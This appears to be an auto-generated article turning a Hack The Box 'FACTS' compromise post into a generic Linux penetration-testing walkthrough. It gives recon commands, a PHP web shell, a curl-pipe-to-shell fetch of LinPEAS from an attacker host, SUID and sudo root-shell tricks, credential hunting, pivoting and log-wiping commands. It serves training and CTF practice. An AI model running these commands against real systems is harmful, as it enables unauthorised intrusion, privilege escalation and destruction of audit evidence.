Listen to this Post

Introduction:
Penetration testing platforms like Hack The Box have become the modern-day proving ground for cybersecurity professionals, simulating real-world attacks in controlled environments. Successfully compromising a machine, such as the “FACTS” box in HTB’s Season 10, requires a blend of systematic reconnaissance, vulnerability exploitation, and post-compromise privilege escalation. This article deconstructs the underlying methodologies and technical commands that lead to such a “pwn,” transforming a celebratory post into a actionable learning blueprint for red teams and blue teams alike.
Learning Objectives:
- Understand the core methodology for approaching an unknown HTB/Linux machine.
- Learn practical commands for reconnaissance, exploitation, and privilege escalation on Linux systems.
- Identify common misconfigurations and vulnerabilities that lead to full system compromise.
You Should Know:
1. The Reconnaissance Phase: Mapping the Attack Surface
Every successful penetration test begins with thorough enumeration. Before attacking, you must discover what you’re facing.
Step‑by‑step guide explaining what this does and how to use it.
Network Scanning: Use `nmap` to discover open ports and services.
Aggressive scan for top 1000 ports with service detection nmap -sV -sC -O -T4 <TARGET_IP> Full TCP port scan (slower but thorough) nmap -p- -T4 <TARGET_IP> UDP scan for critical services (DNS, SNMP) sudo nmap -sU --top-ports 100 <TARGET_IP>
Web Application Enumeration: If HTTP/HTTPS ports are open, enumerate directories, subdomains, and technologies.
Directory brute-forcing with Gobuster gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt Technology fingerprinting with WhatWeb whatweb http://<TARGET_IP>
2. Initial Foothold: Exploiting the First Vulnerability
The initial breach often comes from a vulnerable service or web application.
Step‑by‑step guide explaining what this does and how to use it.
Analyzing Service Versions: Cross-reference discovered service versions (from nmap -sV) with databases like Exploit-DB or Searchsploit.
Search for exploits locally using Searchsploit searchsploit "Apache 2.4.49" Examine a specific exploit searchsploit -x 12345
Web Exploitation – File Upload Bypass: A common vector. If you find an upload function, test for bypasses.
<!-- Sample malicious PHP shell for upload --> <?php system($_GET['cmd']); ?>
Try extensions: .php5, .phtml, .phar, or double extensions: shell.php.jpg.
Use Burp Suite to intercept and modify the `Content-Type` header to image/jpeg.
3. Establishing a Stable Shell: Upgrading Your Access
A basic web shell is unstable. Upgrade to a fully interactive TTY shell.
Step‑by‑step guide explaining what this does and how to use it.
On the victim machine, after gaining command execution:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Background the shell with Ctrl+Z, then on your attacker machine:
stty raw -echo; fg
Then reset the terminal and export environment variables
reset
export TERM=xterm
export SHELL=bash
stty rows 38 columns 116
4. Post-Exploitation Enumeration: Hunting for Privilege Escalation Vectors
The key to going from user to root lies in meticulous internal enumeration.
Step‑by‑step guide explaining what this does and how to use it.
Manual Linux Enumeration:
Check sudo permissions sudo -l Look for SUID/SGID binaries find / -type f -perm -u=s 2>/dev/null find / -type f -perm -g=s 2>/dev/null Check for world-writable files or directories find / -type f -perm -o=w 2>/dev/null Look for cron jobs crontab -l ls -la /etc/cron Check for readable sensitive files cat /etc/passwd cat /etc/shadow 2>/dev/null
Automated Enumeration Scripts: Use tools like LinPEAS for a comprehensive sweep.
Transfer LinPEAS to the victim machine curl -L http://<ATTACKER_IP>/linpeas.sh | sh
5. Privilege Escalation: Exploiting Misconfigurations
A common vector is exploiting a SUID binary or a writable service running as root.
Step‑by‑step guide explaining what this does and how to use it.
SUID Binary Exploit (e.g., find): If `find` has the SUID bit set, you can escalate.
Using find to spawn a root shell find / -exec /bin/sh \; -quit
Exploiting Sudo Rights (e.g., vi/vim): If a user can run `vi` as root via sudo.
sudo vim -c ':!/bin/sh'
Kernel Exploitation: As a last resort, if a kernel vulnerability exists.
Identify kernel version uname -a Search for appropriate exploit, compile, and run gcc exploit.c -o exploit chmod +x exploit ./exploit
- Lateral Movement & Pivoting (If Applicable in the Network)
In more complex environments, you may need to move from one compromised host to another.
Step‑by‑step guide explaining what this does and how to use it.
Dumping Credentials: Search for passwords in config files, history, or memory.
Search for files containing the word "password" grep -ri "password" /home /opt /var/www 2>/dev/null Check bash history cat ~/.bash_history
SSH Pivoting: Use SSH to create a tunnel to access an internal network.
Create a dynamic SOCKS proxy via the compromised host ssh -D 1080 user@<COMPROMISED_IP> -f -N Then configure proxychains to route tools through this tunnel
- Covering Tracks & Forensic Awareness (For CTFs & Ethical Practice)
Understanding how attacks are logged is crucial for both attackers and defenders.
Step‑by‑step guide explaining what this does and how to use it.
Clearing Logs (Demonstrative):
Clear current user's history history -c Overwrite and delete the history file shred -zu ~/.bash_history Remove a user's entry from wtmp/lastlog (requires root) echo "" > /var/log/wtmp
Note: In real engagements, this is done only within strict rules of engagement. In CTFs like HTB, it’s often unnecessary.
What Undercode Say:
- Methodology Over Tools: The specific tool matters less than the underlying process: Recon, Foothold, Enumeration, Escalation. Mastering this cycle is more valuable than memorizing a thousand exploits.
- Context is King: Automated scripts like LinPEAS are invaluable, but they generate noise. The real skill lies in manually interpreting findings—understanding why a writable cron job or a specific SUID binary is a critical vulnerability in that particular system’s context.
Analysis: Jean Hurtado’s post, adorned with certifications like eJPTv2 and ISO 27001, underscores a vital trend: the cybersecurity industry increasingly values demonstrable, hands-on skill alongside formal knowledge frameworks. Platforms like Hack The Box bridge the gap between theory and the chaotic reality of offensive security. The “FACTS” machine compromise isn’t just a badge; it’s a microcosm of a real-world attack chain, from external enumeration to root dominance. It highlights that persistent threats often stem not from zero-days, but from unpatched services, misconfigurations, and weak credential hygiene—all issues that robust internal enumeration can uncover.
Prediction:
The future of penetration testing and threat simulation will be deeply intertwined with AI and automation. We will see AI-assisted reconnaissance that dynamically prioritizes attack vectors, and automated penetration testing platforms that can continuously probe for new vulnerabilities as systems update. However, the human element—the creative thinking required to chain together unconventional vulnerabilities, as often needed in HTB—will remain irreplaceable. The rise of these platforms will consequently push the industry towards a “continuous penetration testing” model, integrating red team tactics directly into DevOps (DevSecOps) pipelines, making security an ongoing, dynamic process rather than a periodic audit.
▶️ Related Video (72% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Jean Hurtado – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


